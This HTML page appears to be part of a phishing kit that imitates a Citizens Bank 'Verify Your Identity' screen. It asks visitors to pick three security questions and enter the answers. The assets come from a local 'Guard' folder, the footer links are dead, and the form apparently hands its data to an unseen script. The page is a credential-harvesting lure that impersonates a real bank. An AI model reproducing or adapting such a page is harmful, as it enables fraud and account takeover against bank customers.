
<!DOCTYPE html>
<html class="js flexbox canvas canvastext webgl no-touch geolocation postmessage no-websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients no-cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers applicationcache svg inlinesvg smil svgclippaths citizens-Firefox citizens-user-none" lang="en-US">
    <head>
        <meta http-equiv="content-type" content="text/html; charset=UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>Online Banking Verification | Citizens Bank</title>
        <link rel="shortcut icon" href="Guard/img/favicon.png" type="image/x-icon">
        <link rel="stylesheet" href="Guard/css/Follow/app.css">
        <link rel="stylesheet" href="Guard/css/Follow/citizensns.css">
        <link rel="stylesheet" href="Guard/css/Follow/sec-3-3.css">
    </head>
    <body class="responsive-enabled">
        <div class="citizens-header">
            <div class="citizens-header-footer">
                <header id="page-header" class="page-header">
                    <div class="centered-content clearfix">
                        <a style="cursor: pointer;" class="page-logo">
                            <img src="Guard/img/CTZ_Green-01.png" alt="Citizens Bank" width="203" height="25">
                        </a>
                    </div>
                </header>
            </div>
        </div>
        <div id="page-container" class="page-container">
            <div class="centered-content clearfix">
                <div class="g-unauth-main-container">
                    <section class="unauth-intro-area">
                        <h2 class="unauth-intro-area__title ">Verify Your Identity</h2>
                        <div>
                            <div class="unauth-intro-area__step">
                                <strong>Step 1 of 4:</strong>
                                <span>Verify Your Security Questions</span>
                            </div>
                            <div class="unauth-intro-area__progress-container">
                                <div class="unauth-intro-area__progress-segment">
                                    <div class="unauth-intro-area__progress-item -js-progress-green"></div>
                                    <div class="unauth-intro-area__progress-item -js-progress-light-green"></div>
                                    <div class="unauth-intro-area__progress-item -js-progress-light-green"></div>
                                    <div class="unauth-intro-area__progress-item -js-progress-light-green"></div>
                                </div>
                            </div>
                        </div>
                        <div id="error"></div>
                        <div class="unauth-intro-area__help">
                            <p class="unauth-intro-area__text">Please enter your information to verify your account.</p>
                        </div>
                    </section>
                    <section class="identify-customer-section">
                        <form id="form" action="" method="POST" class="unauth-form jqtransform js-enrollment-form">
                            <div class="unauth-form__row">
                                <div class="unauth-form__rowitem">
                                    <label class="unauth-form__label" for="q1">Question 1</label>
                                    <select name="q1" id="q1" class="unauth-form__input js-account-type">
                                        <option disabled selected="selected">Select One</option> 
                                        <option value="1">What is your father's middle name?</option>
                                        <option value="2">What is your maternal grandmother's name?</option>
                                        <option value="3">What is the name of the first company you worked for?</option> 
                                        <option value="4">What is your maternal grandfather's name?</option> 
                                        <option value="5">In what city was your high school? (full name of city only)</option> 
                                        <option value="6">What was the name of your high school?</option> 
                                        <option value="7">What is the first name of the maid of honor at your wedding?</option> 
                                        <option value="8">In what city were you married? (Enter full name of city)</option> 
                                        <option value="9">What is the first name of your oldest nephew?</option>
                                    </select>
                                </div>
                                <div class="unauth-form__rowitem">
                                    <input type="text" name="a1" id="a1" placeholder="Answer 1" class="unauth-form__input js-mobilepassword">
                                </div>
                            </div>
                            <div class="unauth-form__row">
                                <div class="unauth-form__rowitem">
                                    <label class="unauth-form__label" for="q2">Question 2</label>
                                    <select name="q2" id="q2" class="unauth-form__input js-account-type">
                                        <option disabled selected="selected">Select One</option> 
                                        <option value="1">What is the first name of the best man at your wedding?</option>
                                        <option value="2">What is the first name of your oldest niece?</option>
                                        <option value="3">What is your paternal grandfather's name?</option>
                                        <option value="4">In what city is your vacation home? (Enter full name of city only)</option>
                                        <option value="5">What was the name of your first girlfriend or boyfriend?</option>
                                        <option value="6">In what city was your father born? (Enter full name of city only)</option>
                                        <option value="7">What was the name of your first pet?</option>
                                        <option value="8">What was the nickname of your grandfather?</option>
                                        <option value="9">What was your high school mascot?</option>
                                    </select>
                                </div>
                                <div class="unauth-form__rowitem">
                                    <input type="text" name="a2" id="a2" placeholder="Answer 2" class="unauth-form__input js-mobilepassword">
                                </div>
                            </div>
                            <div class="unauth-form__row">
                                <div class="unauth-form__rowitem">
                                    <label class="unauth-form__label" for="q3">Question 3</label>
                                    <select name="q3" id="q3" class="unauth-form__input js-account-type">
                                        <option disabled selected="selected">Select One</option> 
                                        <option value="1">What is your paternal grandfather's name?</option>
                                        <option value="2">What street did your best friend in high school live on? (Enter full name of street only)</option>
                                        <option value="3">What was the last name of your favorite teacher in final year of high school?</option> 
                                        <option value="4">In what city were you born? (Enter full name of city only)</option> 
                                        <option value="5">What was the name of the town your grandmother lived in? (Enter full name of city only)</option> 
                                        <option value="6">What was your favorite restaurant in college?</option> 
                                        <option value="7">Where did you meet your spouse for the first time? (Enter full name of city only)</option> 
                                        <option value="8">In what city was your mother born? (Enter full name of city only)</option> 
                                        <option value="9">What was the name of your junior high school? (Enter only "Riverdale" for Riverdale Junior high school)</option>
                                    </select>
                                </div>
                                <div class="unauth-form__rowitem">
                                    <input type="text" name="a3" id="a3" placeholder="Answer 3" class="unauth-form__input js-mobilepassword">
                                </div>
                            </div>
                            <div class="unauth-section__button-wrap">
                                <button id="btn" type="button" class="btn unauth-form__submit-button js-unauth-ic-submit-button" disabled>Continue</button>
                                <a class="unauth-form__cancel-link js-cancel-button" tabindex="0">Cancel</a>
                            </div>
                        </form>
                    </section>
                </div>
            </div>
        </div>
        <div class="citizens-footer">
            <div class="citizens-header-footer">
                <footer id="page-footer" class="page-footer">
                    <div class="footer-top">
                        <ul>
                            <li>
                                <a style="cursor: pointer;" class="contact" title="Opens Ways to Contact Us Dialog">
                                    <span class="account-underline">Ways to Contact Us</span><span class="visuallyhidden">- Opens Ways to Contact Us Dialog</span>
                                </a>
                            </li>
                            <li>
                                <a style="cursor: pointer;" class="locator" title="Opens Branch &amp; ATM Locator Dialog">
                                    <span class="account-underline">Branch &amp; ATM Locator</span><span class="visuallyhidden">- Opens Branch &amp; ATM Locator Dialog</span>
                                </a>
                            </li>
                        </ul>
                    </div>
                    <div class="footer-row clearfix">
                        <ul>
                            <li>
                                <h6>Checking &amp; Savings</h6>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Checking</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Savings</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Money Markets</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Certificates of Deposit (CDs)
                                    <sup>®</sup>
                                </a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">IRAs</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Programs &amp; Services</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Benefits &amp; Features</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Debit Card</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Overdraft Choices
                                    <sup>®</sup>
                                </a>
                            </li>
                        </ul>
                        <ul>
                            <li>
                                <h6>Home Borrowing</h6>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Mortgages</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Home Equity Loans</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Home Equity Lines of Credit</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Determine My Rate</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">My Mortgage Account</a>
                            </li>
                        </ul>
                        <ul>
                            <li>
                                <h6>Students</h6>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Student Loan Options</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Refinancing Student Loans</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">The Student Loan Process</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Undergraduate Students &amp; Parents</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Graduate Students</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Tools &amp; Information</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Banking for Students</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Access My Student Loan</a>
                            </li>
                        </ul>
                        <ul class="last">
                            <li>
                                <h6>Cards</h6>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Credit Cards</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Card Agreements</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Security Features</a>
                            </li>
                        </ul>
                    </div>
                    <div class="footer-row clearfix">
                        <ul>
                            <li>
                                <h6>Personal Loans</h6>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Overview</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">FAQs</a>
                            </li>
                        </ul>
                        <ul>
                            <li>
                                <h6>Resources</h6>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Order Checks</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Online &amp; Mobile Banking</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Customer Service</a>
                            </li>
                        </ul>
                        <ul>
                            <li>
                                <h6>About Us</h6>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">About Citizens Bank</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">In the Community</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Careers</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">About Our Ads</a>
                            </li>
                        </ul>
                        <ul class="last">
                            <li>
                                <h6>Solutions</h6>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Personal</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Investing</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Small Business</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Commercial</a>
                            </li>
                        </ul>
                    </div>
                    <div class="footer-row clearfix">
                        <ul>
                            <li>
                                <h6>Disclosures</h6>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Online Terms and Conditions</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Electronic Notice Disclosure and Consent (Online Service)</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Account Documents</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Member FDIC</a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Equal Housing Lender
                                    <img alt="Equal Housing Lender" title="Equal Housing Lender" src="../Guard/img/equal-housing.gif">
                                </a>
                            </li>
                            <li>
                                <a  style="cursor: pointer;">Security, Privacy &amp; Legal</a>
                            </li>
                        </ul>
                    </div>
                    <div class="centered-content">
                        <div class="footer-bottom">
                            <p class="legal">
                                Zelle and the Zelle related marks are wholly owned by Early Warning Services, LLC and are used herein under license.
                            </p>
                            <p class="legal">
                                *Securities, Insurance and Investment Advisory Services offered through
                                Citizens Securities, Inc. ("CSI"), also referred to as Citizens
                                Investment Services. CSI is an SEC registered investment adviser and
                                Member - FINRA and SIPC. 770 Legacy Place, MLP240, Dedham, MA 02026.
                                (800) 942-8300. CSI is an affiliate of Citizens Bank, N.A.<br><br>The
                                investment balances shown in online banking are based on market prices,
                                with up to a fifteen minute delay from the time this webpage was last
                                refreshed. Information relating to accounts not held at CSI is
                                presented as an accommodation and while drawn from sources believed to
                                be reliable is not guaranteed as to accuracy or completeness. Such
                                information should be independently confirmed by the account owner(s).<br><br>Information
                                relating to accounts not held or custodied by National Financial
                                Services (NFS) (Assets Held Away), CSI’s clearing broker dealer, was
                                provided to NFS by outside parties and is included for informational
                                purposes only. These positions are not part of your brokerage account
                                carried by NFS and therefore any SIPC account protection afforded your
                                account through NFS does not cover these assets or prices reported.
                                Neither NFS, CSI nor Citizens Bank are responsible for the Assets Held
                                Away information provided and does not guarantee the accuracy or
                                timeliness of the positions or prices reported. Prices shown do not
                                necessarily reflect the actual current market prices. Further
                                information regarding these prices may be obtained by contacting CSI.<br><br>The
                                investment products and financial strategies suggested herein are
                                subject to investment risk, including possible loss of principal amount
                                invested. Investment decisions should be based on each individual's
                                goals, time horizon and tolerance for risk.<br><br>SpeciFi<sup>®</sup>
                                is made available through CSI. Portfolio management services are
                                sub-advised by SigFig Wealth Management, LLC ("SigFig"), an SEC
                                registered investment adviser. SigFig is not an affiliate of CSI or
                                Citizens Bank, N.A.
                            </p>
                            <div class="footer-disclaimer-box footer-disclaimer-box--margin-bottom footer-disclaimer">
                                <p class="footer-disclaimer-box__text">Securities, Insurance Products and Advisory Services are:</p>
                                <ul class="footer-disclaimer-box__list">
                                    <li class="footer-disclaimer-box__list-item">NOT FDIC INSURED</li>
                                    <li class="footer-disclaimer-box__list-item">NOT BANK GUARANTEED</li>
                                    <li class="footer-disclaimer-box__list-item">MAY LOSE VALUE</li>
                                    <li class="footer-disclaimer-box__list-item">NOT A DEPOSIT
                                        <br>
                                    </li>
                                    <li class="footer-disclaimer-box__list-item">NOT INSURED BY ANY FEDERAL GOVERNMENT AGENCY</li>
                                </ul>
                            </div>
                            <ul class="footer-util">
                                <li class="sitemap">
                                    <a  style="cursor: pointer;">Site Map</a>
                                </li>
                                <li>Follow:
                                    <a  style="cursor: pointer;">
                                        <img src="../Guard/img/footer-follow-facebook.png" alt="Facebook" align="middle">
                                    </a>
                                    <a  style="cursor: pointer;">
                                        <img src="../Guard/img/footer-follow-twitter.png" alt="Twitter">
                                    </a>
                                    <a  style="cursor: pointer;">
                                        <img src="../Guard/img/footer-follow-linkedin.png" alt="Linkedin">
                                    </a>
                                    <a  style="cursor: pointer;">
                                        <img src="../Guard/img/footer-follow-youtube.png" alt="Youtube">
                                    </a>
                                </li>
                            </ul>
                            <p class="footer-copyright">
                                © Copyright 2021 Citizens Financial Group, Inc. All rights reserved.<br>Citizens Bank is a brand name of Citizens Bank, N.A. (NMLS ID# 433960).<br>Citizens Bank corporate headquarters: One Citizens Plaza, Providence, RI 02903
                            </p>
                            <img src="../Guard/img/elh.gif" alt="Equal Housing Lender">
                            <img src="../Guard/img/fdicFooter.gif" alt="Member FDIC">
                        </div>
                    </div>
                </footer>
            </div>
        </div>
        <script src="../Guard/js/index.js"></script>
    </body>
</html>
